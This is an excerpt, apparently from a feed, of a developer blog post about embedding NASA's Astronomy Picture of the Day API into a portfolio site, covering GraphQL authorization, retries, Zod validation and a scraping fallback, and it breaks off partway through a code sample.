      <link>https://forem.com/lfariaus/i-embedded-nasas-api-into-my-portfolio-with-fallback-scraping-rate-limiting-and-zero-3gbh</link>
      <guid>https://forem.com/lfariaus/i-embedded-nasas-api-into-my-portfolio-with-fallback-scraping-rate-limiting-and-zero-3gbh</guid>
      <description>&lt;p&gt;I integrated NASA's Astronomy Picture of the Day &lt;em&gt;(&lt;a href="https://api.nasa.gov/" rel="noopener noreferrer"&gt;read about it&lt;/a&gt;)&lt;/em&gt; into my portfolio.&lt;/p&gt;

&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;SPOILER ALERT: Contains rate limiting, fallback scraping, modular architecture, and production-grade error handling that never leaves users hanging.&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  The Vision: Bringing Space to My Portfolio
&lt;/h2&gt;

&lt;p&gt;My portfolio (&lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;) runs a full-stack MERN application with authentication, a chatbot, and a GraphQL API. I wanted to add something unique — something that would genuinely delight users while showcasing real-world API integration skills.&lt;/p&gt;

&lt;p&gt;Between terms of my Master's Degree, I had a few weeks off. Perfect vacation project, right? BTW, I'm open-sourcing the whole thing — check it out! &lt;a href="https://github.com/lfariabr" rel="noopener noreferrer"&gt;mastersSWEAI repo&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The idea:&lt;/strong&gt; A floating action button that reveals NASA's daily Astronomy Picture of the Day (APOD). Simple concept, complex execution.&lt;/p&gt;

&lt;h3&gt;
  
  
  The User Experience
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6m40xt1v6lazjqqq3phl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6m40xt1v6lazjqqq3phl.png" alt="NASA APOD Floating Action Button" width="800" height="454"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Click the NASA rocket button: 👉 &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Anonymous users:&lt;/strong&gt; Get today's APOD instantly — no login required&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Authenticated users:&lt;/strong&gt; Browse NASA's entire archive dating back to 1995&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rate limiting:&lt;/strong&gt; 5 requests/hour per user to protect the NASA API quota&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Resilience:&lt;/strong&gt; If NASA's API fails, automatic HTML scraping fallback kicks in&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here's exactly what happens when someone clicks that rocket button:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff1rfjhbia1le0zoowa2z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff1rfjhbia1le0zoowa2z.png" alt="NASA APOD Mermaid Diagram" width="800" height="543"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;👉 &lt;em&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/tree/master/_docs/devTo/t1_2026/img/apod_flow.jpeg" rel="noopener noreferrer"&gt;See the image in HD&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  The Challenge: External APIs Are Unreliable
&lt;/h2&gt;

&lt;p&gt;Integrating third-party APIs sounds straightforward — until reality hits:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;NASA API Reality&lt;/th&gt;
&lt;th&gt;Production Requirements&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;Rate limits&lt;/strong&gt; (1000 req/day)&lt;/td&gt;
&lt;td&gt;Must protect quota, gracefully throttle users&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;504 Gateway Timeouts&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Can't show users blank screens&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Validation issues&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;NASA sometimes returns &lt;code&gt;media_type: "other"&lt;/code&gt; with no &lt;code&gt;url&lt;/code&gt; field&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Network failures&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;ETIMEDOUT, connection refused, DNS issues&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Schema drift&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;NASA API evolves independently of your code&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;The goal:&lt;/strong&gt; Build an integration that:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Handles every failure mode gracefully&lt;/li&gt;
&lt;li&gt;Never crashes the server&lt;/li&gt;
&lt;li&gt;Falls back automatically when NASA is down&lt;/li&gt;
&lt;li&gt;Logs everything for debugging&lt;/li&gt;
&lt;li&gt;Provides structured errors to clients&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Spoiler: NASA's API went down during development. More than once.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Architecture: Layered Resilience
&lt;/h2&gt;

&lt;p&gt;Here's the system I designed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Browser (Next.js/React)
    ↓
GraphQL API (Apollo Server)
    ↓
APOD Service Layer
    ├──→ NASA API (primary, with retries + timeout)
    └──→ HTML Scraping Fallback (when API fails)
         ↓
    Redis Rate Limiter (atomic Lua scripts)
         ↓
    MongoDB (cache successful responses)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Key Architectural Decisions (3 of them!)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;1. GraphQL Shield for Authorization&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;getTodaysApod&lt;/code&gt; is public (no login)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;getApodByDate&lt;/code&gt; requires authentication (prevents abuse)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Modular Service Design&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;src/services/apod/
├── index.ts              # Barrel export
├── apod.service.ts       # Orchestrator (API + fallback)
├── apod.api.ts           # NASA API client
├── apod.fallback.ts      # HTML scraping fallback
├── apod.errors.ts        # Typed error codes
├── apod.types.ts         # Zod schemas, TypeScript types
└── apod.constants.ts     # URLs, timeouts, retry config
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;3. Shared Error Handling Infrastructure&lt;/strong&gt;&lt;br&gt;
Instead of copy-pasting try/catch blocks across every resolver (we've all been there), I built a reusable error handler:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// src/utils/errors/graphqlErrors.ts&lt;/span&gt;
&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;createErrorHandler&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;TCode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;TError&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nx"&gt;mapErrorCode&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;code&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;TCode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;ErrorCode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;isServiceError&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;unknown&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;error&lt;/span&gt; &lt;span class="k"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;TError&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;defaultMessage&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;withErrorHandling&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;T&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="nx"&gt;fn&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Promise&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;T&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
    &lt;span class="nx"&gt;operationName&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;
  &lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="nb"&gt;Promise&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;T&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now any service can use it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// APOD resolver (34 lines total)&lt;/span&gt;
&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;ApodQueries&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="na"&gt;getTodaysApod&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="k"&gt;async &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;_&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;__&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;context&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt;
    &lt;span class="nf"&gt;withApodErrorHandling&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
      &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nf"&gt;fetchApod&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;context&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;userId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;context&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;?.&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;}),&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;getTodaysApod&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;
    &lt;span class="p"&gt;),&lt;/span&gt;

  &lt;span class="na"&gt;getApodByDate&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="k"&gt;async &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;_&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;context&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;context&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="k"&gt;throw&lt;/span&gt; &lt;span class="nx"&gt;Errors&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;unauthenticated&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;Authentication required&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;withApodErrorHandling&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
      &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nf"&gt;fetchApod&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;date&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;args&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;date&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;context&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;userId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;context&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;}),&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;getApodByDate&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;
    &lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  The Journey: 8 Issues, 40+ Commits, 1 Production Feature
&lt;/h2&gt;

&lt;p&gt;This didn't work on the first try. Or the fifth. Here's the honest implementation timeline:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Tracked in:&lt;/strong&gt; &lt;a href="https://github.com/lfariabr/luisfaria.dev/blob/master/_docs/featureBreakdown/v2.4.Apod.MD" rel="noopener noreferrer"&gt;Epic v2.4 - APOD Feature&lt;/a&gt;&lt;br&gt;
&lt;a href="https://github.com/search?q=repo%3Alfariabr%2Fluisfaria.dev+++apod&amp;amp;type=commits&amp;amp;s=committer-date&amp;amp;o=desc" rel="noopener noreferrer"&gt;All 40+ commits to (apod) feature&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Phase 1: Foundation (Issues #61-65)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Frontend: NASA-Branded Floating Action Button&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Built &lt;code&gt;ApodFab.tsx&lt;/code&gt; following the same pattern as the existing &lt;code&gt;GogginsFab&lt;/code&gt; component:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Circular button with NASA gradient border (&lt;code&gt;linear-gradient(135deg, #0B3D91, #FC3D21, #1E90FF)&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Rocket icon with blue pulse aura effect&lt;/li&gt;
&lt;li&gt;Radix UI tooltip: "Astronomy Picture of the Day"&lt;/li&gt;
&lt;li&gt;Accessible (ARIA labels, keyboard navigation)&lt;/li&gt;
&lt;li&gt;Light/dark mode support&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Frontend: APOD Dialog Component&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Created &lt;code&gt;ApodDialog.tsx&lt;/code&gt; with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Date display with calendar icon&lt;/li&gt;
&lt;li&gt;Image/video player (handles both media types)&lt;/li&gt;
&lt;li&gt;Copyright attribution&lt;/li&gt;
&lt;li&gt;External link to NASA APOD website&lt;/li&gt;
&lt;li&gt;"Powered by NASA Open APIs" footer&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Backend: Configuration &amp;amp; Validation&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Set up NASA API credentials:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// backend/src/config/config.ts&lt;/span&gt;
&lt;span class="kr"&gt;interface&lt;/span&gt; &lt;span class="nx"&gt;Config&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nl"&gt;nasaApiKey&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;requiredEnvVars&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;NASA_API_KEY&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;...];&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Server refuses to start without &lt;code&gt;NASA_API_KEY&lt;/code&gt; — fail fast, no silent surprises.&lt;/p&gt;




&lt;h3&gt;
  
  
  Phase 2: NASA API Client (Issue #66)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Zod Schema for Runtime Validation&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;NASA's API returns JSON, but not all fields are guaranteed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// src/validation/schemas/apod.schema.ts&lt;/span&gt;
&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;apodResponseSchema&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;object&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;copyright&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;string&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
  &lt;span class="na"&gt;date&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;string&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;regex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sr"&gt;/^&lt;/span&gt;&lt;span class="se"&gt;\d{4}&lt;/span&gt;&lt;span class="sr"&gt;-&lt;/span&gt;&lt;span class="se"&gt;\d{2}&lt;/span&gt;&lt;span class="sr"&gt;-&lt;/span&gt;&lt;span class="se"&gt;\d{2}&lt;/span&gt;&lt;span class="sr"&gt;$/&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="na"&gt;explanation&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;string&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;min&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="na"&gt;media_type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;enum&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;image&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;video&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;other&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]),&lt;/span&gt;  &lt;span class="c1"&gt;// 'other' was missing initially!&lt;/span&gt;
  &lt;span class="na"&gt;title&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;string&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;min&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="na"&gt;url&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;string&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;url&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;  &lt;span class="c1"&gt;// Not provided for media_type: "other"&lt;/span&gt;
  &lt;span class="na"&gt;hdurl&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;string&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;url&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
  &lt;span class="na"&gt;apod_url&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;string&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;url&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;  &lt;span class="c1"&gt;// Computed field&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="kd"&gt;type&lt;/span&gt; &lt;span class="nx"&gt;ApodResponse&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;infer&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="k"&gt;typeof&lt;/span&gt; &lt;span class="nx"&gt;apodResponseSchema&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;NASA API Service with Retries&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Built &lt;code&gt;apod.api.ts&lt;/code&gt; with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Exponential backoff retries (3 attempts)&lt;/li&gt;
&lt;li&gt;8-second timeout per request&lt;/li&gt;
&lt;li&gt;AbortController for proper cleanup&lt;/li&gt;
&lt;li&gt;Structured logging (latency, status code, userId)
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;fetchApodFromApi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;context&lt;/span&gt;&lt;span class="p"&gt;?:&lt;/span&gt; &lt;span class="nx"&gt;ApodRequestContext&lt;/span&gt;
&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="nb"&gt;Promise&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;ApodResponse&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;startTime&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Date&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;now&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;controller&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;AbortController&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
